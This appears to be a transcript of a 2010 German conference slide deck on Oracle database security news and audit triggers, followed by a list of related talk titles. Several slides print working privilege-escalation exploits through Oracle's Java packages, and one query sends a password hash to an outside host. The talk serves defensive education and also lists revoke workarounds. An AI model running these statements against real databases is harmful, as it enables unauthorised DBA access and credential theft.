DOAG Regional-Treffen München
|
|
- Lisa Weber
- vor 6 Jahren
- Abrufe
Transkript
1 DOAG Regional-Treffen München Alexander Kornbrust 21-Apr-2010
2 Über Red-Database-Security! Red-Database-Security GmbH! Specialisiert in Oracle Security! Mehr als 400 Oracle Security Fehler gemeldet! Kunden weltweit! Services und Produkte! Security Audits! Oracle Security Training! Oracle Security Software Solutions
3 Table of Content Inhalt Oracle Security News Verwendung von Datenbank Event Triggern
4 Oracle Security News Oracle 0Day in Java (korrigiert mit CPU April 2010) Oracle CPU April 2010 Neuer Oracle Password Cracker PL/SQL Unwrapper für Oracle 10g/11g veröffentlicht Oracle & MitM
5 Oracle 0day in Java Als Abschiedsgeschenk von David Litchfield, der sich aus dem Datenbank-Security Thema zurückzieht. Zuerst auf der Blackhat DC veröffentlicht. Auf den Präsentationsfolien waren die Exploits zu sehen. Ein Video der Präsentation davon tauchte im Internet auf und verbreitete sich sehr schnell. Diese Lücke betrifft Oracle alle Versionen 11.2, 11.1 und Mit dem April 2010 CPU/PSU bzw. der Version für Windows hat Oracle dieses Problem gelöst. Weiterhin wurde von David gezeigt, wie man die 11g Netzwerk ACLs umgehen kann (" SELECT SYS.DBMS_LDAP.INIT ((SELECT PASSWORD FROM SYS.USER$ WHERE rownum=1) '.orasploit.com',80) FROM DUAL "). Utl_http, httpuritype, funktionieren standardmäsig in 11g nicht mehr.
6 Oracle 0Day in Java (10.2) DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; CURSOR C1 IS SELECT 'GRANT',USER,'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL; BEGIN OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1; DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); END; / SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/ Wrapper','main', '/oracle/10g/bin/sqlplus', '/ as sysdba', '@ FROM DUAL;set role dba;revoke dba from public;
7 Oracle 0Day in Java (10.2) -- Privilegien Eskalation DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; CURSOR C1 IS SELECT 'GRANT',USER,'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL; BEGIN OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1; DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); END; / -- Ausführen beliebiger OS Befehle SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/ Wrapper','main', 'executable', 'param1', 'param2') FROM DUAL;set role dba;revoke dba from public;
8 Oracle 0Day in Java (11.2) DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; CURSOR C1 IS SELECT 'GRANT',user,'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL; BEGIN OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1; DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); END; / SELECT DBMS_JAVA.SET_OUTPUT_TO_JAVA('ID','oracle/ aurora/rdbms/dbmsjava','sys', 'writeoutputtofile','text', NULL, NULL, NULL, NULL, 0,1,1,1,1,0,'DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO ' user '''; END;', 'BEGIN NULL; END;') FROM DUAL;EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOW ('NO_SUCH_SUBSCRIPTION', SYSDATE());set role DBA;
9 Oracle 0Day in Java - Workaround Revoke execute on dbms_java from public; Revoke execute on dbms_java_test from public; Revoke execute on dbms_jvm_exp_perms from public; Revoke execute on oracle/aurora/util/wrapper FROM PUBLIC; Revoke execute on oracle/aurora/utl/paramparser from PUBLIC; grant execute on DBMS_JVM_EXP_PERMS TO IMP_FULL_DATABASE; grant execute on DBMS_JVM_EXP_PERMS TO EXP_FULL_DATABASE; grant execute on dbms_java to system; (any OEM database user) to avoid problems with public synonyms
10 Oracle April 2010 Korrektur von 7 Sicherheitslücken in der Datenbank. Der kritischste lt. Oracle mit CVSS 7.1 ist ein Buffer Overflow im Create User Kommando. Meiner Ansicht nach jedoch eher unkritisch, da ein Benutzer normalerweise keine "CREATE USER" Rechte hat. Meines Erachtens der kritischste ist der Java Fehler (wie vorhin gezeigt) mit einem CVSS Rating von 6.5 bzw Von Red-Database-Security wurde ein Fehler korrigiert, der es erlaubt Daten mittels "explain plan" zu extrahieren, ohne dass Auditing dies mitbekommt. Empfehlung: Unbedingt einspielen
11 Neuer Passwort Cracker OPS_SSE2 Dennis Yurichev hat einen neuen Passwort Cracker veröffentlicht, der ca 3 Mal schneller als der bisherige Spitzenreiter ist. Auf schnellerer Hardware kann sogar die 10 fache Geschwindigkeit erreicht werden. Dadurch kann ein 8- stelliges DBA Passwort (Zahlen & Ziffern) innerhalb eines Tages geknackt werden. Kritische Passworte (DBA, Anwendungen,...) sollten mindestens 10 Zeichen (9i-10g) bzw. 11 Zeichen (11g) lang sein. Die neuen SHA1 Hashes können sogar bis zu 20 Mal (!!!) schneller geknackt werden. Alte DES-Hashes sind sicherer als neue SHA1-Hashes
12 Repscan / Woraauthbf Length cs cs s min min 36 5 h h d d d yrs yrs Repscan 3.0, 4,400,000 pw/second QuadCore 2.4 GHz
13 OPS_SSE2 Length cs cs s 36 1 min min min ,5 h h ,5 d d ,2 mon 36 3 yrs OPS_SSE2, 36,500,000 pw/second Dual Six-Core AMD Opteron(tm) Processor 2427 (2.2 GHz)
14 Oracle Man-In-The-Middle Angriff Auf der Security Konferenz "Blackhat 2010 Europe" wurden letzte Woche von Steve Ocepek und Wendel Guglielmetti Henrique 2 neue Tools Vamp und Thicknet vorgestellt, mit denen man laufende Oracle Sessions kapern und die Inhalte verändern kann. Damit ist es ohne großes Wissen mögliche, eine unverschlüsselte Oracle TNS Session zu übernehmen. In Zukunft wird man solche Angriffe häufiger sehen. Diese Tools werden zur Zeit noch verbessert und dann zum Download zur Verfügung gestellt.
15 Oracle Unwrapper Niels Teusink hat auf seinem Blog einen Python Unwrapper für Oracle 10g/11g Code veröffentlicht. Damit kann man gewrappte Packages wieder in den unverschlüsselten Ursprungszustand zurückversetzen.
16 Verwendung von Datenbank Event Trigger zur Erhöhung der Sicherheit
17 Logon Trigger Protokollieren alle Logon Versuche mit Zusätzlich zum "Create Session" werden hier auch Datenbank Jobs mitprotokolliert. Zur Reduzierung der Daten sollten Jobs, häufig wiederkehrende Daten ausgeblendet werden.
18 DDL Trigger Protokollieren alle DDL Befehle mit Gute Übersicht, wer was in der Datenbank verändert hat. Z.T. werden DDL Befehle von Oracle abgesetzt
19 Error Trigger Protokollieren (fast) alle Datenbank Fehler mit Findet Konfigurationsfehler Hilft bei der Fehleranalyse Erlaubt das Entdecken von Angriffen über SQL Injection (hauptsächlich bei Webanwendungen)
20 Screenshots
21 Screenshots
22 Screenshots
23 Screenshots
24 Screenshots
25 Beispielcode Beispielcode wird zusammen mit dieser Präsentation veröffentlicht
26 Fragen? Fragen?
27 Contact Red-Database-Security GmbH Bliesstraße Neunkirchen Germany Phone: Fax: training@red-database-security.com
DOAG Konferenz Best of Oracle Security Alexander Kornbrust 16-Nov Red-Database-Security. .consulting.solutions.
DOAG Konferenz 2006 Best of Oracle Security 2006 Alexander Kornbrust 16-Nov-2006 Red-database-security, Alexander Kornbrust, 16-11-2006 1.01 1 Über GmbH GmbH Spezialisiert für Oracle Security Mehr als
MehrDOAG 2016 Oracle APEX Security
Für die Restricted Einstellung sind nur folgende Items vorgesehen: Display as Text (escape special characters, does not save state) Display as Text (does not save state) Display as Text (based on LOV,
MehrBest of Oracle Security 2006
Best of Oracle Security 2006 Alexander Kornbrust 26-Oct-2006 Red-database-security, Alexander Kornbrust, 26-10-2006 1.01 1 Inhaltsangabe Einführung Oracle CPU Januar 2006 0day Mod_plsql Oracle E-Business-Suite
MehrSchlüsselworte Oracle Security, DBA in 2 Minuten, Metasploit, DB18, 0day, Oracle View Bug, SQL Injection, Unwrapper, dbms_assert, shellcode
DBA in 2 Minuten Autor: Ort: Alexander Kornbrust Neunkirchen, Deutschland Schlüsselworte Oracle Security, DBA in 2 Minuten, Metasploit, DB18, 0day, Oracle View Bug, SQL Injection, Unwrapper, dbms_assert,
MehrBest of Oracle Security 2007
DOAG Konferenz 2007 Best of Oracle Security 2007 21-Nov-2007 Alexander Kornbrust Red Database Security GmbH 1 Parkplatz-Quiz (DOAG 2007) 2 Quiz 3 4 5 6 7 8 9 10 Agenda Oracle CPUs Neue Lücken Oracle Rootkits
Mehr<Insert Picture Here> Security-Basics. Privilegien, Rollen, SQL und PL/SQL - inkl. 12c-Update. Carsten Czarski, ORACLE Deutschland B.V. Co.
Security-Basics Privilegien, Rollen, SQL und PL/SQL - inkl. 12c-Update Carsten Czarski, ORACLE Deutschland B.V. Co. KG Themen Rechte, Rollen und PL/SQL: Grundsätzliches Invokers vs.
MehrDatenbank Rootkits. Alexander Kornbrust 01-April-2005. Red-Database-Security GmbH. Alexander Kornbrust, 01-Apr-2005 V1.07 1
Datenbank Rootkits Alexander Kornbrust 01-April-2005 Alexander Kornbrust, 01-Apr-2005 V1.07 1 Agenda 1. Einführung 2. OS Rootkits 3. Datenbank Rootkits 4. Ausführungspfad 5. Benutzer verstecken 6. Prozesse
MehrKapitel 4 Dynamisches SQL
Kapitel 4 Dynamisches SQL Flien zum Datenbankpraktikum Wintersemester 2012/13 LMU München 2008 Thmas Bernecker, Tbias Emrich 2010 Tbias Emrich, Erich Schubert unter Verwendung der Flien des Datenbankpraktikums
MehrPrivilegieneskalation in Oracle 12c (und älter)
Privilegieneskalation in Oracle 12c (und älter) Inhalt Einführung Privilegien-Eskalation Oracle 9i/10g Oracle 11g Oracle 12c Inherit all privileges Sicheres Aufsetzen von Oracle 12c Zusammenfassung Einführung
MehrDynamisches SQL. Folien zum Datenbankpraktikum Wintersemester 2009/10 LMU München
Kapitel 4 Dynamisches SQL Folien zum Datenbankpraktikum Wintersemester 2009/10 LMU München 2008 Thomas Bernecker, Tobias Emrich unter Verwendung der Folien des Datenbankpraktikums aus dem Wintersemester
MehrOracle Rootkits & Oracle Würmer - neue Bedrohungen für Datenbanken? Alexander Kornbrust 27-September-2005. Red-Database-Security GmbH
Oracle Rootkits & Oracle Würmer - neue Bedrohungen für Datenbanken? Alexander Kornbrust 27-September-2005 Alexander Kornbrust, 27-Sep-2005 V1.01 1 Agenda 1. Einführung 2. OS Rootkits 3. Oracle Rootkits
MehrKapitel 4 Dynamisches SQL
Kapitel 4 Dynamisches SQL Flien zum Datenbankpraktikum Wintersemester 2010/11 LMU München 2008 Thmas Bernecker, Tbias Emrich unter Verwendung der Flien des Datenbankpraktikums aus dem Wintersemester 2007/08
MehrOracle 12c: Neuerungen in PL/SQL. Roman Pyro DOAG 2014 Konferenz
Oracle 12c: Neuerungen in PL/SQL Roman Pyro DOAG 2014 Konferenz Herrmann & Lenz Services GmbH Herrmann & Lenz Solutions GmbH Erfolgreich seit 1996 am Markt Firmensitz: Burscheid (bei Leverkusen) Beratung,
MehrOracle Security jetzt und in der Zukunft
Oracle Developer Days End-to-End Security in der Oracle Welt Oracle Security jetzt und in der Zukunft 07-März-2007 Alexander Kornbrust Red Database Security GmbH 1 Agenda Einführung Begriffe / Definitionen
MehrEE SE1 Oracle RDBMS. Andrew Lacy Solution Architect. OPITZ CONSULTING Deutschland GmbH. Foto: Siobhan Bickerdike
EE SE1 Oracle RDBMS Andrew Lacy Solution Architect OPITZ CONSULTING Deutschland GmbH Foto: Siobhan Bickerdike DOAG Regio Nürnberg, 17.07.2014 OPITZ CONSULTING GmbH 2014 Seite 1 Agenda Wieso auf SE1 umsteigen?
MehrOracle Sicherheit. Alexander Kornbrust 18-Oktober-2005. Red-Database-Security GmbH. Alexander Kornbrust, 18-Okt-2005 V1.02 1
Oracle Sicherheit Alexander Kornbrust 18-Oktober-2005 Alexander Kornbrust, 18-Okt-2005 V1.02 1 Agenda 1. Einführung 2. TOP-5 Sicherheitsprobleme 3. Neue Trends Oracle Rootkits Oracle Würmer 4. Demonstration
MehrHärtung von Oracle12c Release 1 & 2 Datenbanken Norbert Debes Externer Oracle Datenbankadministrator am Deutschen Patent und Markenamt München
Härtung von Oracle12c Release 1 & 2 Datenbanken Norbert Debes Externer Oracle Datenbankadministrator am Deutschen Patent und Markenamt München Schlüsselworte: Datenbanksicherheit, Härtung, Oracle12c, Multitenant,
MehrBetroffene Produkte: Alle Versionen von Oracle Forms (3.0-10g, C/S und Web), Oracle Clinical, Oracle Developer Suite
Zusammenfassung: Alle Oracle Forms Anwendungen sind per Default durch SQL Injection angreifbar. Oracle Applications >=11.5.9 ist davon nicht betroffen, da hier standardmäßig der Wert FORMSxx_RESTRICT_ENTER_QUERY
MehrOracle Rootkits. Marco Patzwahl MuniQSoft GmbH München-Unterhaching
Oracle Rootkits Marco Patzwahl MuniQSoft GmbH München-Unterhaching Schlüsselworte: Security, Rootkit, Exploits Zusammenfassung Auf Betriebssystemebene erfahren Rootkits derzeit immer größere Aufmerksamkeit.
MehrNeuerungen in Marco Patzwahl MuniQSoft GmbH Unterhaching
Neuerungen in 12.2 Marco Patzwahl MuniQSoft GmbH Unterhaching Schlüsselworte Neuerungen in 12.2, DBA Einleitung Jede neue Datenbankversion bringt diverse Neuerungen mit. Nur welche sind wichtig und welche
MehrErkennung von Datenbank- Angriffen über Webserver und automatische Gegenmaßnahmen (am Beispiel von einer Oracle RDBMS)
Erkennung von Datenbank- Angriffen über Webserver und automatische Gegenmaßnahmen (am Beispiel von einer Oracle RDBMS) Agenda Einführung Typischer Angriff auf einen Webserver Erkennung des SQL Injection
MehrIndividuelles Auditing von vielen Datenbanken
Individuelles Auditing von vielen Datenbanken Agenda Einführung Audit-Ansätze Sicherheitsvorfälle Spinnennetz Lessons Learned Einführung Im Zuge eines großen Auditing-Projektes stellte sich die Frage:
MehrUsername and password privileges. Rechteverwaltung. Controlling User Access. Arten von Rechten Vergabe und Entzug von Rechten DBS1 2004
Arten von Rechten Vergabe und Entzug von Rechten Seite 1 Controlling User Access Database administrator Username and password privileges Users Seite 2 Privileges Database security System security Data
MehrOracle Anti-Hacking. Red Database Security GmbH IT-Verlag München 15.04.2008 Matthias Glock. Red-Database-Security GmbH
Oracle Anti-Hacking Red Database Security GmbH IT-Verlag München 15.04.2008 Matthias Glock Matthias Glock, 15. April 2008 V1.01 1 Agenda 1. Einführung und Beispiele 2. TOP - Sicherheitsprobleme 3. Härten
MehrPraktische SQL-Befehle 2
Praktische SQL-Befehle 2 Datenbanksysteme I WiSe 2018/2019 Todor Ivanov DB1 WS2018 1 Praktische SQL-Befehle Functions Views Triggers Voraussetzung: Laptop + MySQL/ MariaDB + Workbench! DB1 WS2018 2 Airport
MehrSET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
phpmyadmin SQL Dump version 3.2.4 http://www.phpmyadmin.net Host: localhost Erstellungszeit: 13. April 2011 um 18:44 Server Version: 5.1.41 PHP-Version: 5.3.1 SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; /*!40101
MehrSW-Entwurf von selbstverteidigenden Systemen
SW-Entwurf von selbstverteidigenden Systemen Inhalt Einführung Ablauf Angriff aus dem Internet Reaktion auf Angriffe Erkennen von Angriffen Fake-Daten / Honey-Data Error-Trigger Zusammenfassung Einführung
MehrOracle Database Vault Beispiele zur Benutzung
Oracle Database Vault Beispiele zur Benutzung Grundsätzliches: Beispiel für Trennung der Verantwortlichkeiten in unserer Umgebung: wichtige RollenAufgaben: DB-Benutzer Rolle Aufgabe SYS SYSDBA Verwalter
MehrNoSQL mit Postgres 15. Juni 2015
Tag der Datenbanken 15. Juni 2015 Dipl.-Wirt.-Inform. Agenda l Vorstellung l Marktübersicht l Warum PostgreSQL? l Warum NoSQL? l Beispielanwendung Seite: 2 Vorstellung Dipl.-Wirt.-Inform. [1990] Erste
MehrSchnellübersichten. SQL Grundlagen und Datenbankdesign
Schnellübersichten SQL Grundlagen und Datenbankdesign 5 Datenbanken 2 6 Tabellen erstellen und verwalten 3 7 Daten einfügen, aktualisieren, löschen 4 8 Einfache Datenabfragen 5 9 Schlüsselfelder und Indizes
Mehr12. Datenschutz: Zugriffsrechte in SQL Datenschutz: Zugriffsrechte in SQL
12. Datenschutz: Zugriffsrechte in SQL 12-1 Datenschutz: Zugriffsrechte in SQL 12. Datenschutz: Zugriffsrechte in SQL 12-2 Inhalt 1. Anforderungen, Allgemeines 2. Die SQL-Befehle GRANT und REVOKE 3. Sichten
MehrPowerful PL/SQL: Collections indizieren mit VARCHAR2-Indizes
Powerful PL/SQL: Collections indizieren mit VARCHAR2-Indizes Autor: Klaus Friemelt, MT AG DOAGNews Q1_2005 Dieses Werk ist urheberrechtlich geschützt. Die dadurch begründeten Rechte, insbesondere die der
MehrSicherheit und Datenschutz in SAP Systemen. Die Rolle von SAP Sicherheit in der IT-Sicherheit
Sicherheit und Datenschutz in SAP Systemen Die Rolle von SAP Sicherheit in der IT-Sicherheit Agenda 1. SAP als Angriffsziel 2. Bekannte und neue Sicherheitslücken 3 1. SAP als Angriffsziel 1997 die guten
MehrDatenschutz: Zugriffsrechte in SQL
12. Datenschutz: Zugriffsrechte in SQL 12-1 12. Datenschutz: Zugriffsrechte in SQL 12-2 Inhalt Datenschutz: Zugriffsrechte in SQL 1. Anforderungen, Allgemeines 2. Die SQL-Befehle GRANT und REVOKE 3. Sichten
MehrKapitel 9. Embedded SQL. Prof. Dr. Wolfgang Weber Vorlesung Datenbanken 1
Kapitel 9 Embedded SQL Vorlesung Datenbanken 1 Embedded SQL (siehe auch [Date00]) Arbeitsweise ähnlich PL/SQL, allerdings: Normale Programmiersprache mit eingestreuten SQL-Befehlen und anderen Befehlen
MehrWie sicher sind Ihre Daten in der DB?
Wie sicher sind Ihre Daten in der DB? Sven Vetter Technology Manager Principal Consultant, Partner DOAG Konferenz Nürnberg, 16.11.2010 Basel Bern Lausanne Zürich Düsseldorf Frankfurt/M. Freiburg i. Br.
MehrProzedurale Datenbank- Anwendungsprogrammierung
Idee: Erweiterung von SQL um Komponenten von prozeduralen Sprachen (Sequenz, bedingte Ausführung, Schleife) Bezeichnung: Prozedurale SQL-Erweiterung. In Oracle: PL/SQL, in Microsoft SQL Server: T-SQL.
MehrVergessene (?) SQL- und PL/SQL- Funktionen
Vergessene (?) SQL- und PL/SQL- Funktionen Folge 1 Vortrag DOAG-Regiogruppe Freiburg/Südbaden 29.01.13 bulk collect (1) Aufgabenstellung: ca. 50.000 eingelesene Werte an Hand einer ID auf eine vorhandene
MehrEntwicklungsumgebung für die Laborübung
Entwicklungsumgebung für die Laborübung VL Datenbanksysteme Ingo Feinerer Arbeitsbereich Datenbanken und Artificial Intelligence Institut für Informationssysteme Technische Universität Wien Gliederung
MehrOracle 10g Einführung
Kurs Oracle 10g Einführung Teil 2 Oracle 10g Express Edition (XE) Installation auf Windows XP GridAgenda Timo Meyer Administration von Oracle-Datenbanken Seite 1 von 50 Timo Meyer Sommersemester 2006 Seite
MehrAuditing Sinn, Einsatzmöglichkeiten und Performance
Auditing Sinn, Einsatzmöglichkeiten und Performance Webinar Auditing Klaus Reimers Leiter Beratung 09.11.2012, Paderborn kr@ordix.de www.ordix.de Agenda Sinn und Zweck des Auditing Methoden und Einsatzmöglichkeiten
Mehr11g Database Manageability.
11g Database Manageability Claus.Gertler@merlin-zwo.de Agenda Oracle Scheduler Autotask Praktisches Beispiel Vorteile und Nutzen Restriktionen Seite 2 Oracle Scheduler Remote External Job Jobverarbeitung
MehrÜbung PL/SQL Trigger Lösungen
Übung PL/SQL Trigger Lösungen 1) Gebe das aktuelle Datum aus. Wofür steht dual? Ändere das Datum für Deine aktuelle Session auf das Format Jahr (4 Stellen) Monat (2 Stellen) Tag (2 Stellen)[Leerzeichen]Stunde
MehrAuditing und Härtung von Oracle Datenbanken
Auditing und Härtung von Oracle Datenbanken Nadjibullah Rajab Bereichsleiter OPITZ CONSULTING Gummersbach GmbH Essen, 22.04.2009 Auditing und Härtung von Oracle Datenbanken Seite 1 Agenda Bedrohungen Auditing
MehrTOra - Toolkit for Oracle
TOra - Toolkit for Oracle Einführung in das Entwicklungswerkzeug TOra Timo Meyer Seite 1 von 15 OCP DBA 9i 2005-07-05 Seite 1 von 15 Agenda 1. Einleitung 2. Installation 3. TOra Toolkit for Oracle 4. Live-Demonstration
MehrDonnerstag, 10. November h00, Musensaal Database. LogMiner im Einsatz. Marco Patzwahl MuniQSoft GmbH, Unterhaching b.
Donnerstag, 10. November 2005 15h00, Musensaal LogMiner im Einsatz Marco Patzwahl MuniQSoft GmbH, Unterhaching b. München Schlüsselworte: LogMiner, Analyse der Redologdateien, Redolog Audit, fehlerhafte
MehrErfahrungsbericht mit Oracle Spatial
Erfahrungsbericht mit Oracle Spatial DOAG Oracle Spatial & Geodata Day Eva-Maria Kramer Kurzprofil Marktführer für eenvironment: Führendes Softwarehaus für Lösungen zum Umweltmonitoring und raumbezogenen
MehrOracle 11g Release 2: Änderungen unter der Haube. Dierk Lenz DOAG 2011 Konferenz und Ausstellung 16. November 2011
Oracle 11g Release 2: Änderungen unter der Haube Dierk Lenz DOAG 2011 Konferenz und Ausstellung 16. November 2011 Herrmann & Lenz Services GmbH Herrmann & Lenz Solutions GmbH Erfolgreich seit 1996 am Markt
MehrLogging und Debugging. Gerd Volberg OPITZ CONSULTING Deutschland GmbH
Logging und Debugging Gerd Volberg OPITZ CONSULTING Deutschland GmbH Bochum, 20. Februar 2014 OPITZ CONSULTING GmbH Seite 1 Agenda 1. Logging Datenmodell Tabellen Views 2. Debugging Debug-Package Funktionen
MehrDB2 Version 10 Kapitel IT-Sicherheit
(*) IBM DB2 for z/os DB2 Version 10 Kapitel IT-Sicherheit (06_DB2V10_itsicherheit.pptx) (*) ist eingetragenes Warenzeichen der IBM International Business Machines Inc. 1 DB2 Version 10 IT Sicherheit DB2
MehrKuriositäten in der Oracle-Datenbank
Kuriositäten in der Oracle-Datenbank 19. Deutsche ORACLE-Anwenderkonferenz Do. 16.11., 14.00 Uhr, Variohalle 1 Dr. Peter Alteheld, Systemberater MT AG, Bereich Solutions Development, FB Plattform Services
MehrCritical Patch Update und Ihre Applikation funktioniert noch?
Critical Patch Update und Ihre Applikation funktioniert noch? Sven Vetter Principal Consultant / Partner sven.vetter@trivadis.com DOAG Stuttgart, 19.07.2007 Basel Baden Bern Lausanne Zürich Düsseldorf
MehrSoftwaresicherheit. Eine Präsentation von Benedikt Streitwieser und Max Göttl. Einführung Kryptographie und IT-Sicherheit
Softwaresicherheit Eine Präsentation von Benedikt Streitwieser und Max Göttl Einführung Kryptographie und IT-Sicherheit Gliederung Einleitung: Was ist Softwaresicherheit Populäre Beispiele Anforderungen
MehrÜberblick Felix Naumann. Zugriffsrechte Zugriffsrechte erzeugen Zugriffsrechte prüfen Zugriffsrechte vergeben Zugriffsrechte entziehen
Datenbanksysteme I Zugriffskontrolle (kleiner Einschub) 18.1.2007 Felix Naumann Überblick 2 Zugriffsrechte Zugriffsrechte erzeugen Zugriffsrechte prüfen Zugriffsrechte vergeben Zugriffsrechte entziehen
MehrRainer Meisriemler. STCC Stuttgart Oracle Deutschland GmbH 2 / 64
Rainer Meisriemler STCC Stuttgart Oracle Deutschland GmbH 2 / 64 Oracle Database Security Products User Management Oracle Identity Management Enterprise User Security Access Control Oracle Database Vault
MehrIn diesem Anschnitt geht es um die SQL Anweisungen, mit denen ich den Zugriff auf das Datenbankschema steuern kann.
In diesem Anschnitt geht es um die SQL Anweisungen, mit denen ich den Zugriff auf das Datenbankschema steuern kann. All diese Befehle werden unter dem Begriff SQL DLC Data Control Language zusammengefasst.
MehrAb Version 10g werden von Oracle alle unwichtigen Accounts automatisch bei der Installation über den grafischen Installer gesperrt.
Tipps & Tricks: Oracle FAQ's Bereich: DBA Erstellung: 01/2003 Versionsinfo: 7.3-10.2 Letzte Überarbeitung: 06/2009 MP Oracle FAQ Diese Liste soll Ihnen zu den wichtigsten täglichen Fragen eines Datenbank
MehrPowerful PL/SQL: Collections indizieren mit VARCHAR2- Indizes ein Praxisbeispiel
Powerful PL/SQL: Collections indizieren mit VARCHAR2- Indizes ein Praxisbeispiel Schlagworte Autor: Klaus Friemelt, MT AG dynamisches BULK SQL, VARCHAR2-indizierte PL/SQL-Tabellen Einleitung Mit den letzten
MehrChancen und Wachstumsfelder für PostgreSQL
Chancen und Wachstumsfelder für PostgreSQL Harald Armin Massa by Deutschsprachige PostgreSQL Konferenz 2013 Oberhausen Harald Armin Massa 2ndQuadrant Datenbanken seit 1984 Position Value Datenbank auf
MehrOracle Enterprise Manager 12c Database Express (EM Express)
Oracle Enterprise Manager 12c Database Express (EM Express) Josef Lippert Freiberuflicher IT Consultant München Schlüsselworte Oracle Enterprise Manager Database Express, EM Express, Administration Einleitung
MehrOracle Virtual Private Database
Oracle Virtual Private Database Rolf Wesp Consultant Application Development Rolf.Wesp@trivadis.com Düsseldorf, September 2008 Basel Baden Bern Lausanne Zürich Düsseldorf Frankfurt/M. Freiburg i. Br. Hamburg
MehrOracle Security Trends und Ausblick für 2009
Oracle Security 2009 - Trends und Ausblick für 2009 Alexander Kornbrust - Red-Database-Security GmbH DOAG Regionaltreffen - München 1 1 Inhalt Neue Arten der Bedrohung Wo könnten die höchsten Risiken liegen
MehrDipl. Inf. Dipl. Math. Y. Orkunoglu Datum: 11.09.2009
Hochschule Darmstadt DATENBANKEN Fachbereich Informatik Praktikum 3 Dipl. Inf. Dipl. Math. Y. Orkunoglu Datum: 11.09.2009 PL/SQL Programmierung Anwendung des Cursor Konzepts und Stored Procedures Und Trigger
MehrEntwicklungsumgebung für die Laborübung
Vorlesung Datenbanksysteme vom 22.10.2007 Entwicklungsumgebung für die Laborübung Minteka Server SQL*PLUS Einführung nützliche Kommandos und Views Freie Oracle Tools Beispiel Minteka Server Minteka Secure
MehrOracle Security. Seminarunterlage. Version vom
Seminarunterlage Version: 12.12 Version 12.12 vom 29. November 2018 Dieses Dokument wird durch die veröffentlicht.. Alle Rechte vorbehalten. Alle Produkt- und Dienstleistungs-Bezeichnungen sind Warenzeichen
MehrDatenbank-Administration mit personalisierten Accounts
Datenbank-Administration mit personalisierten Accounts Markus Behrendt Bayer Business Services GmbH Leverkusen Schlüsselworte: Oracle Internet Directory, Enterprise User Einleitung Die Administration von
MehrODBC-Verbindungen in Oracle-Datenbanken nutzen
ODBC-Verbindungen in Oracle-Datenbanken nutzen Bereits in der Vergangenheit haben wir verschiedene Möglichkeiten beschrieben, wie sich Daten aus externen Quellen in AutoCAD Map über die ODBC-Verbindung
MehrFunktionen. Überblick über Stored Functions. Syntax zum Schreiben einer Funktion. Schreiben einer Funktion
Überblick über Stored Functions Funktionen Eine Funktion ist ein benannter PL/SQL- Block, der einen Wert zurückgibt. Eine Funktion kann in der Datenbank als Objekt zur wiederholbaren Ausführung gespeichert
MehrAutomatisierungs-Methoden für Multi-Schema-Handling
Mittwoch, 9. November 2005 13h00, Variohalle 6 18. Deutsche ORACLE-Anwenderkonferenz DB-Entwicklung Automatisierungs-Methoden für Multi-Schema-Handling Dr. Kurt Franke debitel AG, Stuttgart Schlüsselworte:
MehrInhaltsverzeichnis. Vorwort... 13. Einleitung... 15
Vorwort.................................................. 13 Einleitung................................................ 15 1 Aufwand versus Sicherheit was ist angemessen?.............. 17 1.1 Warum ist
MehrSQL and PL/SQL unleashed. Neuheiten bei Oracle 11g und Oracle 12c im Bereich SQL und PL/SQL
. Neuheiten bei Oracle 11g und Oracle 12c im Bereich SQL und PL/SQL Johannes Gritsch Themenübersicht Neue Scheduler Job Typen SQL_SCRIPT und BACKUP_SCRIPT SQL RowLimit: PERCENT und TIES WITH-Klausel mit
MehrSQL (Structured Query Language) Schemata Datentypen
2 SQL Sprachelemente Grundlegende Sprachelemente von SQL. 2.1 Übersicht Themen des Kapitels SQL Sprachelemente Themen des Kapitels SQL (Structured Query Language) Schemata Datentypen Im Kapitel SQL Sprachelemente
MehrDie Nutzung von Webservices in der Oracle Datenbank. 11 März 2010
Die Nutzung von Webservices in der Oracle Datenbank 11 März 2010 Agenda Vorstellung Apps Associates Einstieg und Definition Webservice Definition Application Server / Oracle Application Server Oracle Webservices
MehrFakultät für Informatik & Wirtschaftsinformatik DB & IS II - WS Metadaten. Andreas Schmidt Metadaten 1/17
Metadaten Andreas Schmidt Metadaten 1/17 Metadaten Metadaten sind Daten über Daten Data-Dictionary speichert Informationen über die Struktur der Daten, z.b.: Tabellen, Spalten, Datentypen Primär- und Fremdschlüssel,
MehrQMF Tabelle Q.OBJECT_DATA in DB2
News Artikel Foren Projekte Links Über Redscope Join List Random Previous Next Startseite Foren ETL & Base SAS QMF Tabelle Q.OBJECT_DATA in DB2 24 November, 2008-13:23 Wolfgang Hornung wir portieren z.zt.
MehrDOAG ORACLE LogMiner
DOAG 2005 ORACLE LogMiner Einleitung Oracle s LogMiner bietet seit der Version 8i die Möglichkeit, die bereits ausgeführten und in den Redologdateien gespeicherten Transaktionen wieder sichtbar zu machen.
MehrOracle Flashback. in der Praxis Dr. Frank Haney 1
Oracle Flashback in der Praxis 15.11.2006 Dr. Frank Haney 1 Benutzerfehler Benutzerfehler stellen eine große Herausforderung für den DBA dar. Solche sind z.b.: Versehentliches oder böswilliges Löschen
MehrKapitel 8: Zugriffskontrolle
Kapitel 8: Zugriffskontrolle 8. Zugriffskontrolle 8. Datenbanken enthalten häufig vertrauliche Informationen, die nicht jedem Anwender zur Verfügung stehen dürfen. Außerdem wird man nicht allen Anwendern
MehrEntwicklungsumgebung für die Übung
